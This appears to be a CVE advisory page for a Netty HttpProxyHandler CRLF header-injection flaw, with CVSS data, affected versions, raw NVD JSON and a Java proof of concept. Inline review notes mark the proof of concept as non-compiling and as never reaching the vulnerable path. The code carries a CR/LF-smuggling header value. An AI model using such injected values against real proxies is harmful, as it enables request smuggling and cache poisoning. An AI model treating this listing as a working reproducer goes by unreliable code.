Security Vulnerability Report
CVE-2026-42578 CVSS 7.5 HIGH

CVE-2026-42578

Published: 2026-05-13 19:17:23
Last Modified: 2026-05-18 12:54:04

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE
Netty < 4.2.13.Final
Netty < 4.1.133.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
import io.netty.bootstrap.Bootstrap;
import io.netty.channel.*;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioSocketChannel;
import io.netty.handler.codec.http.*;
// NOTE(review): HttpProxyHandler is in io.netty.handler.proxy, the same package as the
// ProxyHandler import on the next line; this import path does not resolve, so the listing
// does not compile as written.
import io.netty.handler.codec.http.proxy.HttpProxyHandler;
import io.netty.handler.proxy.ProxyHandler;
import java.net.InetSocketAddress;

/**
 * Sample attached to CVE-2026-42578 (CWE-113: CR/LF header injection into the CONNECT
 * request built by HttpProxyHandler). Read it as an illustration of the bug class, not as
 * a working reproducer — see the inline notes and the closing comment for why it does not
 * reach the code path the advisory describes.
 */
public class NettyCRLFPoC {
    public static void main(String[] args) throws Exception {
        EventLoopGroup group = new NioEventLoopGroup();
        try {
            Bootstrap b = new Bootstrap();
            b.group(group)
             .channel(NioSocketChannel.class)
             .handler(new ChannelInitializer<SocketChannel>() {
                 @Override
                 protected void initChannel(SocketChannel ch) {
                     // Single-argument constructor: no caller-supplied outboundHeaders are given to
                     // the proxy handler, so the path the advisory describes (outboundHeaders copied
                     // unvalidated into the CONNECT request) is not exercised by this listing.
                     ProxyHandler proxyHandler = new HttpProxyHandler(new InetSocketAddress("proxy.example.com", 8080));
                     ch.pipeline().addLast(proxyHandler);
                     // No HTTP codec is added for the tunneled connection, so nothing here encodes the
                     // HttpRequest written below, and inbound bytes would not be delivered to this
                     // handler as HttpObject — presumably the author assumed a codec; confirm.
                     ch.pipeline().addLast(new SimpleChannelInboundHandler<HttpObject>() {
                         @Override
                         protected void channelRead0(ChannelHandlerContext ctx, HttpObject msg) {
                             System.out.println("Received response: " + msg);
                         }
                     });
                 }
             });
            Channel ch = b.connect("target.example.com", 80).sync().channel();
            // Header value containing CR LF. This request is addressed to the origin over the
            // already-established tunnel; it is not part of the CONNECT request sent to the proxy,
            // which is the only place the advisory says validation is disabled.
            String injectedHeader = "test-value\r\nX-Injected-Header: malicious-content\r\n";
            HttpRequest request = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/");
            request.headers().set(HttpHeaderNames.HOST, "target.example.com");
            request.headers().set("User-Agent", "Netty-Client");
            // NOTE(review): DefaultHttpRequest is created here with its default (validating)
            // headers, so this set(...) is expected to be rejected for the CR/LF before anything
            // is written — confirm against the Netty version in use.
            request.headers().set("X-Vulnerable-Header", injectedHeader);
            ch.writeAndFlush(request);
            ch.closeFuture().sync();
        } finally {
            group.shutdownGracefully();
        }
    }
}
/*
 * Explanation:
 * The advisory describes HttpProxyHandler.newInitialMessage() building the CONNECT request
 * with header validation disabled and copying the caller-supplied outboundHeaders into it,
 * so CR/LF in those values splits the header block (CWE-113); the original author notes this
 * can lead to request smuggling or cache poisoning at the proxy.
 * This listing does not reach that path: the proxy handler is constructed without
 * outboundHeaders, the request above is written on the tunneled connection rather than into
 * the CONNECT, and the request's own header validation is expected to reject the CR/LF value
 * first. Treat it as a sketch of the bug class only.
 * Mitigation: upgrade to 4.2.13.Final / 4.1.133.Final. Until then, header values derived from
 * untrusted input must be rejected if they contain CR or LF before they are handed to the
 * proxy handler.
 */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42578", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:23.210", "lastModified": "2026-05-18T12:54:04.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-113"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.133", "matchCriteriaId": "DFE205A5-2C43-40C9-A2FF-CF6759B8D861"}, {"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.13", "matchCriteriaId": "D94A720F-9CED-4BE9-8C37-FD9E2FD28472"}]}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}